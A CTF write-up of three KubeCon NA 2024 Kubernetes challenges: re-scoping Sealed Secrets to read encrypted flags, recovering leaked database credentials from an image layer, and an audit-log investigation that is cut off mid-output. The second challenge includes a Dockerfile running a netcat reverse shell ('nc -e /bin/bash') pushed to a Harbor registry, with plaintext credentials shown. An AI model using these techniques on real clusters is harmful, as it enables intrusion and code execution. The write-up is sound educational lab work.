KubeCon NA 2024 CTF Writeup


Introduction

Time for another KubeCon, time for another CTF from ControlPlane. Let’s do it!



Once again, I won’t be on the scoreboard for this one, but it took me around 2.5 hours to complete it all.

Challenge 1 - Hush Hush

After SSHing into the first challenge, let’s see what our first objective is.

Can you keep a secret? See if this Kubernetes cluster can.

OK, so retrieving secrets. Seems common enough. I assume it’s just a matter of retrieving various secrets from different namespaces. Let’s dig in by checking our permissions and seeing who we are.

root@entrypoint:~# kubectl auth can-i --list
Resources                                       Non-Resource URLs   Resource Names   Verbs
selfsubjectreviews.authentication.k8s.io        []                  []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                  []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []               [create]
sealedsecrets.bitnami.com                       []                  []               [get list watch create update]
namespaces                                      []                  []               [get list]
secrets                                         []                  []               [get list]
[..SNIP..]

root@entrypoint:~# kubectl get -A secret
Error from server (Forbidden): secrets is forbidden: User "system:serviceaccount:default:entrypoint" cannot list resource "secrets" in API group "" at the cluster scope

OK, so we can view namespaces and secrets, and it also looks like the cluster uses Sealed Secrets: a tool for storing encrypted secrets and having a controller in the cluster decrypt them into the corresponding Kubernetes Secret objects.

The first thing to always do is try just getting secrets; there could be an easy one xD. However, a quick attempt returns no results, so let’s check namespaces.

root@entrypoint:~# kubectl get ns
NAME              STATUS   AGE
default           Active   34m
kube-node-lease   Active   34m
kube-public       Active   34m
kube-system       Active   34m
lockbox           Active   33m

So we have a namespace called lockbox. What permissions do we have in here?

root@entrypoint:~# kubectl -n lockbox auth can-i --list
Resources                                       Non-Resource URLs   Resource Names   Verbs
selfsubjectreviews.authentication.k8s.io        []                  []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                  []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []               [create]
sealedsecrets.bitnami.com                       []                  []               [get list watch create update delete]
namespaces                                      []                  []               [get list]
secrets                                         []                  [test-secret]    [get list]
[..SNIP..]

Right, so we have sealed secrets again (this time including delete), and we can retrieve the test-secret secret; however, it didn’t exist when we queried for it. Guess we move on to the sealed secrets.

root@entrypoint:~# kubectl -n lockbox get sealedsecrets -o yaml
apiVersion: v1
items:
- apiVersion: bitnami.com/v1alpha1
  kind: SealedSecret
  metadata:
    annotations:
      kubectl.kubernetes.io/last-applied-configuration: |
        [..SNIP..]
      sealedsecrets.bitnami.com/cluster-wide: "true"
    creationTimestamp: "2024-11-14T16:54:19Z"
    generation: 1
    name: flag-1
    namespace: lockbox
    resourceVersion: "831"
    uid: eed5447a-dfd5-4a3e-9078-950653a12c6c
  spec:
    encryptedData:
      flag: AgDJcsyMcjj9[..SNIP..]
    template:
      metadata:
        annotations:
          sealedsecrets.bitnami.com/cluster-wide: "true"
          sealedsecrets.bitnami.com/managed: "true"
        name: flag-1
        namespace: lockbox
  status:
    conditions:
    - lastTransitionTime: "2024-11-14T16:54:19Z"
      lastUpdateTime: "2024-11-14T16:54:19Z"
      status: "True"
      type: Synced
    observedGeneration: 1
- apiVersion: bitnami.com/v1alpha1
  kind: SealedSecret
  metadata:
    annotations:
      kubectl.kubernetes.io/last-applied-configuration: |
        [..SNIP..]
      sealedsecrets.bitnami.com/namespace-wide: "true"
    creationTimestamp: "2024-11-14T16:54:20Z"
    generation: 1
    name: flag-2
    namespace: lockbox
    resourceVersion: "836"
    uid: 7535ed94-a3fd-4c15-8252-dd1c229a4e68
  spec:
    encryptedData:
      flag: AgAM8vmuw[..SNIP..]
    template:
      metadata:
        annotations:
          sealedsecrets.bitnami.com/managed: "true"
          sealedsecrets.bitnami.com/namespace-wide: "true"
        name: flag-2
        namespace: lockbox
  status:
    conditions:
    - lastTransitionTime: "2024-11-14T16:54:20Z"
      lastUpdateTime: "2024-11-14T16:54:20Z"
      status: "True"
      type: Synced
    observedGeneration: 1
kind: List
metadata:
  resourceVersion: ""

OK, so we have two sealed secrets in the lockbox namespace, flag-1 and flag-2, and we need to get both of them decrypted to read the actual flags.

Looking closer at their configurations, they carry two distinct annotations: flag-1 is marked cluster-wide and flag-2 is marked namespace-wide. In practice, this means flag-1 can be unsealed under any name in any namespace, while flag-2 can be unsealed under any name, but only within the lockbox namespace.
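As I understand the Sealed Secrets design, the scope decides which label gets bound into the encryption: strict (the default) binds namespace and name, namespace-wide binds only the namespace, and cluster-wide binds nothing, so a sealed value only unseals where that label still matches. Below is a minimal Python model of that rule; the names (`Scope`, `encryption_label`, `can_retarget`) are my own, and this is a sketch of the idea rather than the controller's actual code.

```python
from enum import Enum


class Scope(Enum):
    """Sealing scopes, chosen via the sealedsecrets.bitnami.com/* annotations."""
    STRICT = "strict"                  # default: bound to namespace and name
    NAMESPACE_WIDE = "namespace-wide"  # bound to the namespace only
    CLUSTER_WIDE = "cluster-wide"      # bound to neither


def encryption_label(namespace: str, name: str, scope: Scope) -> str:
    """Label bound into the ciphertext at seal time (assumed model of the scheme)."""
    if scope is Scope.CLUSTER_WIDE:
        return ""
    if scope is Scope.NAMESPACE_WIDE:
        return namespace
    return f"{namespace}/{name}"


def can_retarget(scope: Scope, src: tuple[str, str], dst: tuple[str, str]) -> bool:
    """True if a value sealed for src=(namespace, name) should still unseal as dst."""
    return encryption_label(*src, scope) == encryption_label(*dst, scope)


# flag-1 is cluster-wide: copying it to default/flag-12 keeps the (empty) label
print(can_retarget(Scope.CLUSTER_WIDE, ("lockbox", "flag-1"), ("default", "flag-12")))
# flag-2 is namespace-wide: renaming it within lockbox keeps the label "lockbox"
print(can_retarget(Scope.NAMESPACE_WIDE, ("lockbox", "flag-2"), ("lockbox", "test-secret")))
# ...but moving it to another namespace changes the label, so unsealing would fail
print(can_retarget(Scope.NAMESPACE_WIDE, ("lockbox", "flag-2"), ("default", "flag-2")))
```

This is why flag-1 can go anywhere we can read, while flag-2 has to stay in lockbox under a name we are allowed to read.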

So the approach is to recreate the sealed secrets with a modified name or namespace, so that the controller writes the decrypted values into secrets we can read. We can read any secret in the default namespace, plus test-secret in the lockbox namespace. Let’s do that.

root@entrypoint:~# cat > test.yml <<EOF
> apiVersion: bitnami.com/v1alpha1
kind: SealedSecret
metadata:
  annotations:
    sealedsecrets.bitnami.com/cluster-wide: "true"
  creationTimestamp: "2024-11-14T16:54:19Z"
  generation: 1
  name: flag-12
  namespace: default
  resourceVersion: "831"
  uid: eed5447a-dfd5-4a3e-9078-950653a12c6c
spec:
  encryptedData:
    flag: AgDJcsyMcjj9Z[..SNIP..]
  template:
    metadata:
      annotations:
        sealedsecrets.bitnami.com/cluster-wide: "true"
        sealedsecrets.bitnami.com/managed: "true"
      name: flag-1
      namespace: default
status:
  conditions:
  - lastTransitionTime: "2024-11-14T16:54:19Z"
    lastUpdateTime: "2024-11-14T16:54:19Z"
    status: "True"
    type: Synced
  observedGeneration: 1
> EOF

Starting with the flag-1 secret, we make a new copy of it within the default namespace and apply it.

Success!

root@entrypoint:~# kubectl get secret
NAME      TYPE     DATA   AGE
flag-12   Opaque   1      7s

I definitely did not accidentally make this a 12. Let’s get the flag and move on to flag 2.

root@entrypoint:~# kubectl get secret -o yaml
apiVersion: v1
items:
- apiVersion: v1
  data:
    flag: ZmxhZ19jdGZ7a3ViZV9iZWNhdXNlX2l0c19lbmNyeXB0ZWRfZG9lc250X21lYW5faXRfc2hvdWxkX2JlX3B1YmxpY30=
  kind: Secret
  metadata:
    annotations:
      sealedsecrets.bitnami.com/cluster-wide: "true"
      sealedsecrets.bitnami.com/managed: "true"
    creationTimestamp: "2024-11-14T17:29:47Z"
    name: flag-12
    namespace: default
    ownerReferences:
    - apiVersion: bitnami.com/v1alpha1
      controller: true
      kind: SealedSecret
      name: flag-12
      uid: ce9641cf-e1a8-4878-a829-625dcfbcae67
    resourceVersion: "4097"
    uid: bb71b902-13b5-460d-827c-2e1c18455c98
  type: Opaque
kind: List
metadata:
  resourceVersion: ""

root@entrypoint:~# base64 -d <<< ZmxhZ19jdGZ7a3ViZV9iZWNhdXNlX2l0c19lbmNyeXB0ZWRfZG9lc250X21lYW5faXRfc2hvdWxkX2JlX3B1YmxpY30=
flag_ctf{kube_because_its_encrypted_doesnt_mean_it_should_be_public}
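The values in a Secret’s data map are only base64-encoded, not encrypted, which is why being able to read the generated Secret is enough. A minimal Python sketch that decodes every key at once, assuming the Secret has been fetched as JSON (for example with kubectl get secret flag-12 -o json); the function name is just for illustration:

```python
import base64


def decode_secret_data(secret: dict) -> dict:
    """Decode every value in a Secret's `data` map from base64 to UTF-8 text."""
    return {
        key: base64.b64decode(value).decode("utf-8")
        for key, value in secret.get("data", {}).items()
    }


# Shaped like `kubectl get secret flag-12 -o json` output, trimmed to `data`
secret = {
    "data": {
        "flag": "ZmxhZ19jdGZ7a3ViZV9iZWNhdXNlX2l0c19lbmNyeXB0ZWRfZG9lc250X21lYW5faXRfc2hvdWxkX2JlX3B1YmxpY30="
    }
}
print(decode_secret_data(secret)["flag"])
```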

For flag-2 the concept is similar, but we keep it in the lockbox namespace and rename it to test-secret, the one secret we can read there.

root@entrypoint:~# cat > test.yml <<EOF
> apiVersion: bitnami.com/v1alpha1
kind: SealedSecret
metadata:
  annotations:
    sealedsecrets.bitnami.com/namespace-wide: "true"
  creationTimestamp: "2024-11-14T16:54:20Z"
  generation: 1
  name: test-secret
  namespace: lockbox
  resourceVersion: "836"
  uid: 7535ed94-a3fd-4c15-8252-dd1c229a4e68
spec:
  encryptedData:
    flag: AgAM8v[..snip..]
  template:
    metadata:
      annotations:
        sealedsecrets.bitnami.com/managed: "true"
        sealedsecrets.bitnami.com/namespace-wide: "true"
      name: test-secret
      namespace: lockbox
status:
  conditions:
  - lastTransitionTime: "2024-11-14T16:54:20Z"
    lastUpdateTime: "2024-11-14T16:54:20Z"
    status: "True"
    type: Synced
  observedGeneration: 1
> EOF

A quick find and replace later, we have replaced flag-2 with test-secret. Hopefully that gets us our secret after a quick apply.
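Rather than hand-editing the copied YAML, the same find and replace can be scripted. A minimal Python sketch, assuming the original was exported as JSON (kubectl -n lockbox get sealedsecret flag-2 -o json) and the result is fed to kubectl apply -f; the function name is hypothetical. It also drops server-populated fields (uid, resourceVersion, status and so on) that don’t belong in a new object:

```python
import copy

# Server-populated metadata that should not be carried over into a new object.
SERVER_FIELDS = ("uid", "resourceVersion", "creationTimestamp", "generation", "managedFields")
LAST_APPLIED = "kubectl.kubernetes.io/last-applied-configuration"


def retarget_sealed_secret(sealed: dict, name: str, namespace: str) -> dict:
    """Return a copy of a SealedSecret aimed at namespace/name.

    This only unseals if the original scope allows the new identity
    (namespace-wide for a rename, cluster-wide for a namespace move).
    """
    out = copy.deepcopy(sealed)
    out.pop("status", None)
    meta = out.setdefault("metadata", {})
    for field in SERVER_FIELDS:
        meta.pop(field, None)
    meta.get("annotations", {}).pop(LAST_APPLIED, None)
    meta["name"], meta["namespace"] = name, namespace
    # Keep the template metadata consistent with the new identity as well.
    template_meta = out.setdefault("spec", {}).setdefault("template", {}).setdefault("metadata", {})
    template_meta["name"], template_meta["namespace"] = name, namespace
    return out
```

For example, json.dumps(retarget_sealed_secret(original, "test-secret", "lockbox"), indent=2) produces a manifest that kubectl apply -f accepts, since kubectl reads JSON as well as YAML.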

root@entrypoint:~# k get secret test-secret -o yaml
apiVersion: v1
data:
  flag: ZmxhZ19jdGZ7dGhpc19vbmVfd2FzX2FfYml0X21vcmVfaW52b2x2ZWRfd2VsbF9kb25lfQ==
kind: Secret
metadata:
  annotations:
    sealedsecrets.bitnami.com/managed: "true"
    sealedsecrets.bitnami.com/namespace-wide: "true"
  creationTimestamp: "2024-11-14T17:34:08Z"
  name: test-secret
  namespace: lockbox
  ownerReferences:
  - apiVersion: bitnami.com/v1alpha1
    controller: true
    kind: SealedSecret
    name: test-secret
    uid: f56052fd-ddc0-41a5-8b4d-81c99da3ab8f
  resourceVersion: "4497"
  uid: fdf5af5e-c1da-4a38-b553-1d6292fadb87
type: Opaque

root@entrypoint:~# base64 -d <<< ZmxhZ19jdGZ7dGhpc19vbmVfd2FzX2FfYml0X21vcmVfaW52b2x2ZWRfd2VsbF9kb25lfQ==
flag_ctf{this_one_was_a_bit_more_involved_well_done}

Excellent! I don’t think it was any more involved than the first, despite what the flag suggests… just a different target secret.

Challenge 2 - Overlooked

Moving on to the next challenge. After SSHing in we get the following message:

Vapor Real Estate have launched their new offering, Clouds!

But in creating their new public site, vapor-app.kubesim.tech, they have overlooked their container registry.

Review vapor-ops.harbor.kubesim.tech, see if you can compromise the environment and attempt to access the underlying nodes.

To access the sites, you'll need to jump through our bastion host using the following command:

sudo ssh -L 80:localhost:8080 -F simulator_config -f -N -i simulator_rsa bastion

Setting up the port-forward (to port 8080 on my host rather than 80, as I don’t run ssh as root), we can reach the two sites from the welcome message: vapor-app.kubesim.tech and vapor-ops.harbor.kubesim.tech.

The vapor-app just looks like a simple website:





Harbor looks more inviting, though, judging by both its UI and the initial message.

Harbor is essentially a container registry, so hopefully we can find some container images, and maybe even push our own back up to it.

We are greeted by a login page, but the default credentials (admin / Harbor12345) don’t work. Neither do a few random weak credentials, so that’s probably not the way in.

However, there is a nice search bar at the top… let’s try searching for vapor, since that’s the name of the app.



Oh nice, we found the vapor-app image. Ignoring the unauthorized error, let’s see what we can learn about this image through the UI.



Looks like there is a single tag associated with this image, and investigating that we get to an overview of the image.



Scrolling down, we eventually find the build history for the image.

According to it, there is a flag.txt in the webroot of the vapor app, so let’s try fetching that.

$ curl http://vapor-app.kubesim.tech:8080/flag.txt
flag_ctf{UNRAVELLING_LAYERS_REVEALS_OVERLOOKED_CONFIG}

The flag also hints at the next step: unravelling layers. So let’s pull the image and see what we can find. At this point I needed the registry on port 80 to pull via Docker / Podman, so I set up socat to redirect port 80 to 8080 (sudo socat TCP-LISTEN:80,fork,reuseaddr TCP:localhost:8080), as I still didn’t want to run ssh as root.

I then used podman to pull the image after configuring vapor-ops.harbor.kubesim.tech as an insecure registry.

$ podman pull vapor-ops.harbor.kubesim.tech/vapor/vapor-app
Trying to pull vapor-ops.harbor.kubesim.tech/vapor/vapor-app:latest...
Getting image source signatures
Copying blob 6c88960df4dc done |
Copying blob 2445dbf7678f done |
Copying blob c2f813e589e0 done |
Copying blob eb96cf2614db done |
Copying blob f291067d32d8 done |
Copying blob 22318e3d6450 done |
Copying config a27cbe29ba done |
Writing manifest to image destination
a27cbe29ba9cff146703603e5ca425dc2a91bf8d936af1fb7f70885e7c1fa8c9

The flag said to look at the layers, so let’s save the image as a tar and open it up.

$ podman save vapor-ops.harbor.kubesim.tech/vapor/vapor-app -o output.tar.gz
Copying blob 05ef21d76315 done |
Copying blob 91f7bcfdfda8 done |
Copying blob 314324e26a14 done |
Copying blob adc4c5856533 done |
Copying blob 4ae31aa0d18c done |
Copying blob 1f9b325b7795 done |
Copying config a27cbe29ba done |
Writing manifest to image destination

After extracting it, we have a folder full of its layers, config, etc. We can quickly untar the layers and then search for files. The earlier build history mentioned a .env file, so let’s search for that first.
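The reason an old .env can survive is that each layer is its own tar: a later layer replacing a file does not remove it from the earlier one. A minimal Python sketch that searches every layer of a docker-archive style tar (which, as far as I know, is what podman save writes by default) for a filename, without extracting anything to disk. It assumes the archive has a manifest.json listing the layer paths under Layers; the function name is hypothetical.

```python
import io
import json
import posixpath
import tarfile
from typing import BinaryIO, Iterator


def find_in_layers(archive: BinaryIO, filename: str) -> Iterator[tuple[str, str]]:
    """Yield (layer_path, member_path) for every copy of filename in every layer."""
    with tarfile.open(fileobj=archive) as outer:
        manifest = json.load(outer.extractfile("manifest.json"))
        for layer_path in manifest[0]["Layers"]:
            # Each layer is itself a tar (possibly compressed); read it into memory.
            data = outer.extractfile(layer_path).read()
            with tarfile.open(fileobj=io.BytesIO(data)) as layer:
                for member in layer.getmembers():
                    if member.isfile() and posixpath.basename(member.name) == filename:
                        yield layer_path, member.name
```

Usage would be along the lines of opening output.tar.gz in binary mode and printing each (layer, path) pair for ".env"; two hits in different layers is exactly the situation found below.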

$ ls *.tar | xargs -n 1 atool -x
./
./etc/
./etc/passwd
./root/
./home/
./home/nonroot/
[..SNIP..]

$ find . -name .env
./var/www/.env
./adc4c5856533521e8f3bb91b00c48bd4aa05939924cdeb46384b7c0315bccf9a/var/www/.env

$ cat var/www/.env
DB_HOST=localhost
DB_PORT=5432
DB_USER=<replace_with_secret>
DB_PASSWORD=<replace_with_secret>
DB_NAME=signups
SSL_MODE=disable

$ cat ./adc4c5856533521e8f3bb91b00c48bd4aa05939924cdeb46384b7c0315bccf9a/var/www/.env
DB_HOST=localhost
DB_PORT=5432
DB_USER=vapor
DB_PASSWORD=Access4Clouds
DB_NAME=signups
SSL_MODE=disable
FLAG=flag_ctf{MITRE_ATT&CK_T1078.003}

Nice, that is the next flag. One more left.

The flag hints at MITRE ATT&CK T1078.003, the technique Valid Accounts: Local Accounts, strongly pointing at the vapor credentials in the file. So let’s try using the credentials from the .env file to log in to the Harbor registry.

Nice, we are logged in as the vapor user. Roaming around the UI, I don’t find much else. However, I did have the thought of trying to push a new image to the registry.

After authenticating to the registry with podman, I quickly pushed a test image built on top of the existing one, just to see what would happen. It simply added another file to the webroot, and fetching that file afterwards worked, suggesting that any image pushed to the registry gets deployed.

The next step is to leverage that to get a shell. I made a new Dockerfile which simply opens a netcat reverse shell to one of my servers (HOST and PORT are placeholders for my listener’s address and port):

FROM skybound/net-utils
CMD ["nc", "-e", "/bin/bash", "HOST", "PORT"]

Pushing this image to the registry and waiting with a listener, we finally get a shell.

$ podman build -t vapor-ops.harbor.kubesim.tech/vapor/vapor-app .
STEP 1/2: FROM skybound/net-utils
STEP 2/2: CMD ["nc", "-e", "/bin/bash", "HOST", "PORT"]
COMMIT vapor-ops.harbor.kubesim.tech/vapor/vapor-app
--> 70a71e205cd5
Successfully tagged vapor-ops.harbor.kubesim.tech/vapor/vapor-app:latest
70a71e205cd584a65186e47ed487f4e69b08b1c01cfb8b2ecf120a8ffda34c27

$ podman push vapor-ops.harbor.kubesim.tech/vapor/vapor-app
Getting image source signatures
Copying blob ea29029be8d0 done |
Copying blob cfdba3a48071 done |
Copying blob ec35c5ac0948 done |
Copying blob 05b112a436da done |
Copying blob 450b2325c05f done |
Copying blob 1e55ea280126 done |
Copying blob e28c6efb7361 done |
Copying blob a761c640feab done |
Copying config 70a71e205c done |
Writing manifest to image destination

$ nc -nlvp 8080
Listening on 0.0.0.0 8080
Connection received on 13.41.213.25 20322
id
uid=0(root) gid=0(root) groups=0(root)
kubectl auth whoami
ATTRIBUTE                                          VALUE
Username                                           system:serviceaccount:vapor-app:default
UID                                                37871bf3-1f49-4f3e-b02d-8ddeb0b32ac9
Groups                                             [system:serviceaccounts system:serviceaccounts:vapor-app system:authenticated]
Extra: authentication.kubernetes.io/credential-id  [JTI=d4f59323-1d94-4c39-953c-2a1154107375]
Extra: authentication.kubernetes.io/node-name      [node-1]
Extra: authentication.kubernetes.io/node-uid       [97b5fbd8-f98d-4c5c-a661-af8c39e3c4fa]
Extra: authentication.kubernetes.io/pod-name       [vapor-app-79c4fd456c-tv2cs]
Extra: authentication.kubernetes.io/pod-uid        [86cad8e5-18d9-4f70-8a9e-70676a22e3c6]

Enumerating the container, the output of mount shows that the host filesystem appears to be mounted (read-only) into the container at /host/.
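Spotting a mount like this is easier with a filter than by eye. A small Python sketch that parses the classic mount output format (DEVICE on MOUNTPOINT type FSTYPE (OPTIONS)) and lists block-device filesystems mounted somewhere other than /. The heuristic and the names are my own assumption, not a standard tool: in a typical pod it will also flag the per-file mounts such as /etc/hosts, so treat the result as a list of candidates to look at.

```python
import re
from typing import NamedTuple

MOUNT_LINE = re.compile(
    r"^(?P<dev>\S+) on (?P<target>\S+) type (?P<fstype>\S+) \((?P<opts>[^)]*)\)$"
)


class Mount(NamedTuple):
    device: str
    target: str
    fstype: str
    options: tuple[str, ...]


def parse_mounts(text: str) -> list[Mount]:
    """Parse `mount` output lines; lines that don't match the format are skipped."""
    mounts = []
    for line in text.splitlines():
        m = MOUNT_LINE.match(line.strip())
        if m:
            opts = tuple(m["opts"].split(","))
            mounts.append(Mount(m["dev"], m["target"], m["fstype"], opts))
    return mounts


def host_mount_candidates(mounts: list[Mount]) -> list[Mount]:
    """Block devices (paths under /dev/) mounted somewhere other than the container root."""
    return [m for m in mounts if m.device.startswith("/dev/") and m.target != "/"]
```

Fed the output above, the /dev/root line mounted at /host with the ro option is the entry that stands out.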

mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/153/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/152/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/151/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/150/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/149/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/148/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/147/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/146/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/154/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/154/work,uuid=on,nouserxattr)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup type cgroup2 (ro,nosuid,nodev,noexec,relatime)
/dev/root on /host type ext4 (ro,relatime,discard,errors=remount-ro)
devtmpfs on /host/dev type devtmpfs (rw,nosuid,noexec,relatime,size=1995372k,nr_inodes=498843,mode=755,inode64)
tmpfs on /host/dev/shm type tmpfs (rw,nosuid,nodev,inode64)
devpts on /host/dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
hugetlbfs on /host/dev/hugepages type hugetlbfs (rw,relatime,pagesize=2M)
[..SNIP..]

Switching to /host/, we find flag.txt, which holds the final flag for this challenge. Yay!

ls -alp
total 4096080
drwxr-xr-x  19 root root       4096 Nov 14 17:31 ./
drwxr-xr-x   1 root root       4096 Nov 14 18:35 ../
lrwxrwxrwx   1 root root          7 Sep 27 02:09 bin -> usr/bin
drwxr-xr-x   4 root root       4096 Nov 14 17:32 boot/
drwxr-xr-x  16 root root       3220 Nov 14 17:31 dev/
drwxr-xr-x 101 root root       4096 Nov 14 17:31 etc/
-rw-r--r--   1 root root         45 Nov 14 17:31 flag.txt
drwxr-xr-x   4 root root       4096 Nov 14 17:24 home/
lrwxrwxrwx   1 root root          7 Sep 27 02:09 lib -> usr/lib
lrwxrwxrwx   1 root root          9 Sep 27 02:09 lib32 -> usr/lib32
lrwxrwxrwx   1 root root          9 Sep 27 02:09 lib64 -> usr/lib64
lrwxrwxrwx   1 root root         10 Sep 27 02:09 libx32 -> usr/libx32
drwx------   2 root root      16384 Sep 27 02:12 lost+found/
drwxr-xr-x   2 root root       4096 Sep 27 02:10 media/
drwxr-xr-x   2 root root       4096 Sep 27 02:10 mnt/
drwxr-xr-x   4 root root       4096 Nov  5 09:03 opt/
dr-xr-xr-x 224 root root          0 Nov 14 17:24 proc/
drwx------   5 root root       4096 Nov 14 17:31 root/
drwxr-xr-x  34 root root       1140 Nov 14 17:32 run/
lrwxrwxrwx   1 root root          8 Sep 27 02:09 sbin -> usr/sbin
drwxr-xr-x   8 root root       4096 Sep 27 02:15 snap/
drwxr-xr-x   2 root root       4096 Sep 27 02:10 srv/
-rw-------   1 root root 4194304000 Nov 14 17:24 swap-hibinit
dr-xr-xr-x  13 root root          0 Nov 14 17:24 sys/
drwxrwxrwt  11 root root       4096 Nov 14 18:38 tmp/
drwxr-xr-x  14 root root       4096 Sep 27 02:10 usr/
drwxr-xr-x  13 root root       4096 Sep 27 02:11 var/
cat flag.txt
flag_ctf{SMALL_MISTAKES_CAN_HAVE_BIG_IMPACTS}

Challenge 3 - Navigation For Sailors

The final challenge. Three more flags to go.

SSHing into the final scenario we get the following message:

We think dread pirate ᶜᵃᵖᵗᵃⁱⁿ Hλ$ħ𝔍Ⱥ¢k has managed to compromise our cluster. Someone has been trying to steal secrets from the cluster, but we aren't sure how or where. Check the logs in /var/log/audit/kube to find out where he got in.

Once you've found the workload, identify what the captain's crew were targetting, and find any other security issues in the cluster.

(Your first flag is the name of the compromised namespace)

OK, so this is more of an incident-response style challenge. Let’s go straight to /var/log/audit/kube and see what’s there. It turns out to be the standard API server audit logs, with log rotation enabled:

root@entrypoint-64bdf7d89c-z6zjs:/var/log/audit/kube# ls
kube-apiserver-2024-11-14T17-35-58.573.log  kube-apiserver-2024-11-14T18-02-45.613.log  kube-apiserver-2024-11-14T18-28-37.151.log  kube-apiserver.log

root@entrypoint-64bdf7d89c-z6zjs:/var/log/audit/kube# wc -l *
  2728 kube-apiserver-2024-11-14T17-35-58.573.log
  5659 kube-apiserver-2024-11-14T18-02-45.613.log
  5589 kube-apiserver-2024-11-14T18-28-37.151.log
  3305 kube-apiserver.log
 17281 total

We know the first flag is the compromised namespace, and we know the attacker is fetching secrets, so let’s look for that.
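Grepping for secrets works, but since every audit log line is a JSON event, it is just as easy to summarise them. A minimal Python sketch that counts denied (HTTP 403) secrets requests per namespace, user and verb across the rotated files; it relies on the audit.k8s.io/v1 Event fields objectRef, user, verb and responseStatus, and both function names are hypothetical.

```python
import glob
import json
from collections import Counter
from typing import Iterable, Iterator


def read_audit_logs(pattern: str = "/var/log/audit/kube/*.log") -> Iterator[str]:
    """Yield every line of the matching files, sorted by filename.

    With these filenames, sorting puts the timestamped rotated files
    before the live kube-apiserver.log.
    """
    for path in sorted(glob.glob(pattern)):
        with open(path) as fh:
            yield from fh


def denied_secret_requests(lines: Iterable[str]) -> Counter:
    """Count 403 responses to secrets requests, keyed by (namespace, username, verb)."""
    counts: Counter = Counter()
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip blank or truncated lines
        if not isinstance(event, dict):
            continue
        ref = event.get("objectRef") or {}
        status = event.get("responseStatus") or {}
        if ref.get("resource") == "secrets" and status.get("code") == 403:
            user = (event.get("user") or {}).get("username", "")
            counts[(ref.get("namespace", ""), user, event.get("verb", ""))] += 1
    return counts
```

Running denied_secret_requests(read_audit_logs()).most_common(5) on the entrypoint should surface the noisiest offender straight away.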

root@entrypoint-64bdf7d89c-z6zjs:/var/log/audit/kube# grep -rhi secrets | jq | head -n 100
{
  "kind": "Event",
  "apiVersion": "audit.k8s.io/v1",
  "level": "Metadata",
  "auditID": "59dca463-3b36-47f9-91b2-72381bfe5481",
  "stage": "ResponseComplete",
  "requestURI": "/api/v1/namespaces/e88wmxbmdfkvp2h945sgpnk7viy1f9la/secrets?limit=500",
  "verb": "list",
  "user": {
    "username": "system:serviceaccount:e88wmxbmdfkvp2h945sgpnk7viy1f9la:captain-hashjack",
    "uid": "038ca2a0-85bd-476e-af70-4b966c2a2eed",
    "groups": [
      "system:serviceaccounts",
      "system:serviceaccounts:e88wmxbmdfkvp2h945sgpnk7viy1f9la",
      "system:authenticated"
    ],
    "extra": {
      [..SNIP..]
    }
  },
  "sourceIPs": [
    "10.0.187.131"
  ],
  "userAgent": "kubectl/v1.28.0 (linux/amd64) kubernetes/855e7c4",
  "objectRef": {
    "resource": "secrets",
    "namespace": "e88wmxbmdfkvp2h945sgpnk7viy1f9la",
    "apiVersion": "v1"
  },
  "responseStatus": {
    "metadata": {},
    "status": "Failure",
    "message": "secrets is forbidden: User \"system:serviceaccount:e88wmxbmdfkvp2h945sgpnk7viy1f9la:captain-hashjack\" cannot list resource \"secrets\" in API group \"\" in the namespace \"e88wmxbmdfkvp2h945sgpnk7viy1f9la\"",
    "reason": "Forbidden",
    "details": {
      "kind": "secrets"
    },
    "code": 403
  },
  [..SNIP..]

OK, so that namespace (e88wmxbmdfkvp2h945sgpnk7viy1f9la) is clearly a dodgy one. Let’s submit it for our first flag… and… it didn’t work. It must have been an earlier compromised namespace that led to the creation of this one. That would make sense: the brief does say to check the logs in /var/log/audit/kube to find out where he got in, and this namespace is probably the one created after the initial compromise.

Let’s track down what created it. I start following the trail and find a Kubernetes user, but after a while the logs vanish… damn logrotate! I spend quite a while trying to glean what information I can before thinking… could it just be this weird namespace? In my first attempt I had submitted e88wmxbmdfkvp2h945sgpnk7viy1f9la without wrapping it in flag_ctf{}, and trying flag_ctf{e88wmxbmdfkvp2h945sgpnk7viy1f9la} works. That was a large waste of time.

Moving on.

The next question asked what the captain’s crew were targeting. Let’s see what permissions we have in the cluster itself; maybe we have some in that namespace?

root@entrypoint-64bdf7d89c-z6zjs:/var/log/audit/kube# kubectl -n e88wmxbmdfkvp2h945sgpnk7viy1f9la auth can-i --list
Resources                                       Non-Resource URLs   Resource Names   Verbs
pods/exec                                       []                  []               [create]
selfsubjectreviews.authentication.k8s.io        []                  []               [create]
selfsubjectaccessreviews.authorization.k8s.io   []                  []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                  []               [create]
nodes                                           []                  []               [get list]
pods/log                                        []                  []               [get list]
pods                                            []                  []               [get list]
deployments.apps                                []                  []               [get list]
[..SNIP..]

Nice, we do have some permissions. Interestingly, exec is at the very top, but we can also view deployments, pods and their logs. Let’s start by looking at the deployment that is trying to get secrets.

root@entrypoint-64bdf7d89c-z6zjs:/var/log/audit/kube# kubectl -n e88wmxbmdfkvp2h945sgpnk7viy1f9la get deployment -o yaml
apiVersion: v1
items:
- apiVersion: apps/v1
